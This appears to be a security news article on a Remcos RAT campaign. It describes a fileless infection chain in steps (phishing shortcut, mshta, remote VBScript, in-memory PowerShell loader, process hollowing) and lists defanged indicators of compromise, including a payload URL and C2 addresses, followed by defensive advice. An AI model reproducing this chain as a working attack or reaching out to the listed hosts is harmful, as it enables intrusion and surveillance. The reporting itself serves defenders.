Remcos RAT Uses Fileless PowerShell Attacks to Evade Detection

A new Remcos RAT campaign is using fileless PowerShell techniques to bypass security defenses and gain persistent remote access to infected systems

  Cyber Security News   Jan 19, 2026   0   31  Add to Reading List
Remcos RAT Uses Fileless PowerShell Attacks to Evade Detection

Introduction

A sophisticated malware campaign involving Remcos RAT (Remote Control and Surveillance Trojan) has recently been identified, showcasing the increasing use of fileless attack techniques by cybercriminals. This approach enables attackers to evade traditional antivirus solutions while maintaining persistent access to compromised systems.

RoxoHost Shared Hosting
RoxoHost Shared Hosting

Originally developed as a legitimate remote administration tool, Remcos has since become widely abused by cybercriminals and Advanced Persistent Threat (APT) groups for espionage, credential theft, and system takeover.

What Is Remcos RAT?

Remcos (Remote Control and Surveillance) is a Remote Access Trojan (RAT) created by Breaking Security. While initially promoted for lawful remote system management, it has been extensively misused for malicious activities such as:

  • Remote command execution

  • Credential and data theft

  • User activity monitoring

  • Persistent system access

Infection Mechanism

In the latest observed campaign, attackers rely on a fileless execution chain that avoids writing malicious files to disk.

Infection Chain

  1. Phishing emails deliver ZIP archives

  2. The ZIP contains a deceptive .lnk shortcut file

  3. Opening the shortcut launches mshta.exe

  4. mshta.exe executes a remote, obfuscated VBScript

  5. The script downloads a PowerShell-based shellcode loader

  6. The loader executes entirely in memory

  7. Remcos RAT is injected into svchost.exe using Process Hollowing

To ensure persistence, the malware modifies the following registry key:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Post-Infection Behavior

Once deployed, Remcos RAT performs several malicious activities:

  • Injects itself into legitimate system processes

  • Collects operating system and software information

  • Monitors file contents and user activity

  • Establishes encrypted TLS communication with its command-and-control server

  • Maintains persistence through registry-based autostart entries

Why This Attack Is Dangerous

  • Fileless execution leaves minimal forensic evidence

  • Abuse of trusted Windows utilities helps evade detection

  • Traditional antivirus solutions often fail to detect memory-based attacks

  • Enables long-term surveillance and full system compromise

Indicators of Compromise (IoCs)

File Hash

https://pastebin.com/KwL8FbAd

Domains

readysteaurants[.]com hxxps://0x0[.]st/8KuV.ps1

IP Addresses

193[.]142[.]146.101 162[.]254[.]39.129 107[.]173[.]4[.]16:2404

Security Recommendations

  • Do not open unsolicited email attachments

  • Block .lnk, .hta, .js, .vbs, and executable attachments

  • Restrict PowerShell and WScript usage

  • Enable PowerShell logging and centralized monitoring

  • Keep operating systems and applications updated

  • Disable RDP if not required

  • Maintain regular offline backups

  • Implement application whitelisting and network segmentation

Conclusion

The latest Remcos RAT campaign highlights how attackers are increasingly relying on fileless PowerShell techniques to bypass traditional defenses. Organizations must adopt a layered security approach, combining endpoint protection, user awareness, and advanced logging to effectively defend against such evolving threats.

Tags